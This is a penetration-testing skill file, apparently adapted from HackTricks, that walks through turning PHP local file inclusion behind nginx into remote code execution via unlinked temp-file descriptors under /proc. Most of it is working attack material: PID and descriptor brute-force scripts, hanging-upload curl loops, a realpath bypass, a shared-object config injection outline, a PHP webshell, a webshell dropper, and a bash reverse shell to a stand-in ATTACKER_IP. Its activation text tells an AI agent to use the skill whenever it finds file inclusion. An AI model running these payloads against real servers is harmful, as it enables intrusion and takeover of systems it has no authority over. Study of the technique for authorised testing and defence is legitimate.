Hacktricks-skills lfi2rce-nginx-temp-files

How to exploit LFI vulnerabilities to achieve RCE by leveraging Nginx temporary file descriptors. Use this skill whenever you encounter LFI vulnerabilities, need to escalate from file inclusion to code execution, or are investigating nginx reverse-proxy configurations with PHP backends. It also applies when you see file-inclusion parameters, nginx in front of PHP-FPM, or need to bypass file path restrictions through /proc filesystem traversal.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files/SKILL.MD
source content

LFI2RCE via Nginx Temp Files

This skill teaches you how to escalate Local File Inclusion (LFI) vulnerabilities to Remote Code Execution (RCE) by exploiting how Nginx handles temporary files when buffering request bodies.

When to Use This Technique

Use this approach when:

  • You have an LFI vulnerability (e.g., ?file=, ?path=, or ?include= parameters)
  • The backend is PHP running behind an Nginx reverse proxy
  • You need to execute arbitrary code but can only include files
  • Standard file paths are restricted or filtered

The Vulnerability Explained

Nginx buffers request bodies to disk when they exceed the in-memory buffer (≈8KB by default). These temp files are written to paths like /var/lib/nginx/body or /tmp/nginx/client-body. The key insight:

  1. Nginx writes the temp file and immediately unlinks it (deletes the filename)
  2. The file descriptor remains open as long as the request is in progress
  3. The descriptor is accessible via /proc/<nginx_pid>/fd/<fd>
  4. PHP's include/require follows these symlinks, allowing you to execute the buffered content

Exploitation Workflow

Step 1: Enumerate Nginx Worker PIDs

Find the PIDs of nginx worker processes by reading /proc/<pid>/cmdline through your LFI:

?file=/proc/1/cmdline
?file=/proc/2/cmdline
...

Look for strings containing nginx: worker process. Worker count rarely exceeds the CPU count, so scanning PIDs 100-4000 is usually sufficient.

Tip: Use the bundled scan_nginx_pids.py script to automate this if you have command execution elsewhere.
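
The scan can also be driven entirely through the LFI itself. A minimal sketch, assuming a hypothetical target URL and a `file` parameter name (adjust both for your target):

```python
# Sketch: enumerate nginx worker PIDs through the LFI.
# base_url and the "file" parameter are placeholders, not real endpoints.
from urllib.parse import urlencode

def cmdline_scan_urls(base_url, param="file", lo=100, hi=4000):
    """Yield LFI URLs that read /proc/<pid>/cmdline for each candidate PID."""
    for pid in range(lo, hi + 1):
        yield f"{base_url}?{urlencode({param: f'/proc/{pid}/cmdline'})}"

def is_worker(body: bytes) -> bool:
    """cmdline fields are NUL-separated; normalize before matching the banner."""
    return b"nginx: worker process" in body.replace(b"\x00", b" ")
```

Fetch each URL with any HTTP client and keep the PIDs whose response satisfies is_worker().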

Step 2: Force Nginx to Create Temp Files

Send large POST/PUT bodies (>8KB) to trigger disk buffering:

# Generate a large payload with your exploit code
curl -X POST http://target/vulnerable.php \
  -H "Content-Length: 1048576" \
  --data-binary @payload.txt \
  --max-time 60

Critical: Keep the connection alive or hang the upload so nginx keeps the file descriptor open. Don't complete the request immediately.
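
One way to keep the descriptor pinned is a raw socket that claims a larger Content-Length than it sends, so nginx buffers what arrived and waits for the rest. A sketch under those assumptions (host, port, and path are placeholders):

```python
# Sketch: hold a request body in nginx's disk buffer by under-sending
# a claimed Content-Length, so the temp-file fd stays open.
import socket

def build_hanging_post(host, path, payload: bytes, claimed_extra=1024):
    """Raw HTTP/1.1 POST whose Content-Length exceeds the bytes we send."""
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(payload) + claimed_extra}\r\n"
        f"Connection: keep-alive\r\n\r\n"
    ).encode()
    return headers + payload

def hold_open(host, port, request: bytes, seconds=60):
    """Send the partial body, then idle while nginx waits for missing bytes."""
    s = socket.create_connection((host, port))
    s.sendall(request)
    s.settimeout(seconds)  # idle here; caller closes after the fd brute force
    return s
```

The payload must exceed the in-memory buffer (>8KB) to reach disk, e.g. your PHP shell followed by several kilobytes of padding.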

Step 3: Map File Descriptors to Temp Files

With the nginx PIDs, brute-force file descriptors (typically 10-45 for body temp files):

?file=/proc/<pid>/fd/10
?file=/proc/<pid>/fd/11
...

When you hit the right descriptor, you'll see your payload content or get execution.

Bypass realpath(): If PHP normalizes paths, use traversal chains:

?file=/proc/<pidA>/cwd/proc/<pidB>/root/proc/<pidC>/fd/<fd>
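
Generating the candidate values for both the plain brute force and the traversal chain is mechanical; a small sketch:

```python
# Sketch: build the candidate LFI values for the fd brute force.
def fd_candidates(pids, fd_lo=10, fd_hi=45):
    """Plain /proc paths, one per (worker pid, fd) pair."""
    return [f"/proc/{pid}/fd/{fd}"
            for pid in pids for fd in range(fd_lo, fd_hi + 1)]

def realpath_bypass(pid_a, pid_b, pid_c, fd):
    """Traversal chain through cwd/root links that resolves to the same fd
    while defeating naive realpath() normalization."""
    return f"/proc/{pid_a}/cwd/proc/{pid_b}/root/proc/{pid_c}/fd/{fd}"
```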

Step 4: Include for Execution

Once you find the descriptor pointing to your buffered payload:

// Your payload in the POST body
<?php system($_GET['cmd']); ?>

// Then include it via LFI
?file=/proc/1234/fd/15&cmd=id

The include executes your PHP code even though the original temp file was unlinked.
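
Combining the include path with the command parameter is a single URL; a sketch with a placeholder base URL:

```python
# Sketch: trigger the buffered shell through the LFI once a live fd is found.
from urllib.parse import urlencode

def trigger_url(base_url, pid, fd, cmd, param="file"):
    """Build ?file=/proc/<pid>/fd/<fd>&cmd=<cmd>, include and command in one request."""
    return f"{base_url}?{urlencode({param: f'/proc/{pid}/fd/{fd}', 'cmd': cmd})}"
```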

Modern Variations (2024-2025)

CVE-2025-1974 (IngressNightmare) Pattern

Ingress controllers and service meshes expose similar attack surfaces:

  1. Push a malicious shared object as request body (>8KB)
  2. Lie in the Content-Length header (claim 1MB, never send the last chunk)
  3. Temp file stays pinned for ~60 seconds
  4. Brute-force /proc/<pid>/fd/<fd> to find the buffered .so
  5. Inject ssl_engine /proc/<pid>/fd/<fd>; into the nginx config
  6. Constructors in the shared object yield RCE

Kubernetes Context

The primitive is the same in orchestrators:

  • Find a way to drop bytes into nginx buffers
  • Walk /proc from anywhere you can issue filesystem reads
  • Privilege boundaries differ, but the core technique remains the same

Practical Tips

Check if Buffering is Enabled

Before attempting exploitation, verify nginx buffering is active:

# Check response headers for buffering indicators
curl -I http://target/ | grep -i x-nginx

# Try to read nginx config via LFI
?file=/etc/nginx/nginx.conf
?file=/etc/nginx/conf.d/*.conf

Look for:

  • proxy_request_buffering on (default)
  • client_body_buffer_size (default ~8KB)
  • proxy_max_temp_file_size (0 disables temp files)
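
If the LFI leaks the config, checking those directives can be automated; a minimal sketch (directive names are real nginx directives, the parsing is intentionally naive):

```python
# Sketch: grep a leaked nginx config for the directives that decide
# whether request-body buffering (and thus this technique) is in play.
import re

DIRECTIVES = ("proxy_request_buffering", "client_body_buffer_size",
              "proxy_max_temp_file_size")

def buffering_settings(conf_text: str) -> dict:
    """Return {directive: value} for each relevant directive present."""
    found = {}
    for name in DIRECTIVES:
        m = re.search(rf"^\s*{name}\s+([^;]+);", conf_text, re.MULTILINE)
        if m:
            found[name] = m.group(1).strip()
    return found

def looks_exploitable(settings: dict) -> bool:
    """Absent directives fall back to defaults, which buffer to disk."""
    if settings.get("proxy_request_buffering") == "off":
        return False
    if settings.get("proxy_max_temp_file_size") == "0":
        return False
    return True
```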

Hanging Uploads

Hanging uploads are noisy but effective:

# Use multiple processes to flood workers
for i in {1..10}; do
  curl -X POST http://target/ \
    -H "Content-Length: 1048576" \
    --data-binary @payload.txt \
    --max-time 120 &
done

At least one temp file should stay around long enough for your LFI brute force.

Use the Procfs Scanner

If you have any code execution primitive, run the bundled scanner:

python3 scan_nginx_pids.py

This outputs usable LFI paths like ?file=/proc/1234/fd/15.

Payload Examples

PHP Shell

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Reverse Shell

<?php
// /dev/tcp is a bash feature; exec() runs via /bin/sh, so invoke bash explicitly
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'");
?>

Webshell Upload

<?php
file_put_contents('/tmp/shell.php', '<?php system($_GET["c"]); ?>');
?>

Common Pitfalls

  1. Buffering disabled: If proxy_request_buffering off or proxy_max_temp_file_size 0 is set, this technique won't work
  2. PID race conditions: Nginx workers may restart; scan PIDs frequently
  3. Descriptor range: File descriptors 10-45 are typical for body temp files, but check your target
  4. Connection timeout: Keep uploads hanging long enough for the LFI brute force to complete
  5. SELinux/AppArmor: May block /proc access; check security contexts

When This Won't Work

  • Nginx buffering is explicitly disabled
  • PHP has open_basedir restrictions blocking /proc
  • The LFI parameter is heavily filtered (e.g., blocks /proc)
  • Running in a container without /proc mounted
  • Nginx is not the reverse proxy (Apache, Caddy, etc. behave differently)